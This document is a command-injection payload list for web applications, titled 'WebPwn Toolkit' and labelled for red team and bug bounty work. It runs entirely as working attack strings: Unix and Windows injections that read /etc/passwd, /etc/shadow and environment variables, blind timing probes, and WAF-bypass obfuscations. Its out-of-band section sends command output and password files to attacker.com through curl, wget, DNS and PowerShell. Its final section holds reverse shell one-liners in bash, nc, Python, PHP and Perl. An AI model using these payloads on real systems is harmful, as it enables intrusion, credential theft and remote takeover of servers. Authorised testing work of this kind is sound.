# ============================================================
# WebPwn Toolkit - Advanced Command Injection Payloads
# Level: Advanced / Red Team / Bug Bounty
# Categories: Basic, Blind, OOB, WAF Bypass, OS-Specific
# ============================================================

# ──────────────────────────────────────────
# [1] UNIX - BASIC SEPARATORS
# ──────────────────────────────────────────
;id
;whoami
;uname -a
;cat /etc/passwd
;ls
;ls -la
|id
|whoami
|cat /etc/passwd
||id
||whoami
&&id
&&whoami
`id`
`whoami`
$(id)
$(whoami)
$(cat /etc/passwd)
;id;
;id|
;id&&
;id%0a
%0aid
%0awhoami

# ──────────────────────────────────────────
# [2] UNIX - INFORMATION GATHERING
# ──────────────────────────────────────────
;uname -a
;hostname
;env
;printenv
;cat /etc/os-release
;cat /etc/shadow
;cat /etc/hosts
;cat /proc/version
;cat /proc/self/environ
;ls /
;ls /etc/
;ls /var/www/
;ls /home/
;ps aux
;netstat -an
;ifconfig
;ip addr
;id;pwd;ls
;id&&pwd&&ls
;id|base64
;cat /etc/passwd|base64

# ──────────────────────────────────────────
# [3] WINDOWS - COMMANDS
# ──────────────────────────────────────────
;dir
&dir
&&dir
|dir
||dir
;whoami
&whoami
&&whoami
;ipconfig
&ipconfig
;type C:\Windows\win.ini
;type C:\Windows\System32\drivers\etc\hosts
;net user
;net localgroup administrators
;systeminfo
;set
;dir C:\
;dir C:\Users\
;echo %USERNAME%
;echo %COMPUTERNAME%
| dir
& dir
&& dir
|| dir

# ──────────────────────────────────────────
# [4] BLIND - TIME-BASED DETECTION
# ──────────────────────────────────────────
; sleep 3
| sleep 3
|| sleep 3
& sleep 3
&& sleep 3
; ping -c 3 127.0.0.1
| ping -c 3 127.0.0.1
$(sleep 3)
`sleep 3`
; timeout 3
& timeout 3
; PING /n 3 127.0.0.1
& PING /n 3 127.0.0.1
%26%26 sleep 3
%7C sleep 3
%3B sleep 3

# ──────────────────────────────────────────
# [5] OUT-OF-BAND (OOB) - EXFILTRATION
# ──────────────────────────────────────────
; curl http://attacker.com/$(id)
; wget http://attacker.com/?c=$(id)
; ping $(whoami).attacker.com
; nslookup $(whoami).attacker.com
; curl http://attacker.com/?data=$(cat /etc/passwd|base64)
; wget -q --post-data="$(cat /etc/passwd)" http://attacker.com/
$(curl http://attacker.com/?c=$(id))
`curl http://attacker.com/?c=$(id)`
; powershell -c "Invoke-WebRequest http://attacker.com/?c=(whoami)"
& powershell -c "IWR http://attacker.com/?c=(whoami)"

# ──────────────────────────────────────────
# [6] WAF BYPASS
# ──────────────────────────────────────────
;{id}
;{cat,/etc/passwd}
;$IFS$()id
;$IFS$()cat$IFS$/etc/passwd
;cat$IFS/etc/passwd
;%0aid
;%0awhoami
;%0acat%20/etc/passwd
;'i'd
;id$@
;"i"d
;{id,}
;{ls,-la,/}
;/bin/c?t /etc/passwd
;/bin/ca* /etc/passwd
;/???/??t /etc/?????
;c'a't /etc/passwd
;c"a"t /etc/passwd
;w'h'o'a'm'i
;wh\oami
;who$@ami

# ──────────────────────────────────────────
# [7] REVERSE SHELL ONE-LINERS
# ──────────────────────────────────────────
;bash -i >& /dev/tcp/attacker.com/4444 0>&1
;bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
;nc -e /bin/sh attacker.com 4444
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f
;python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
;php -r '$sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
;perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'
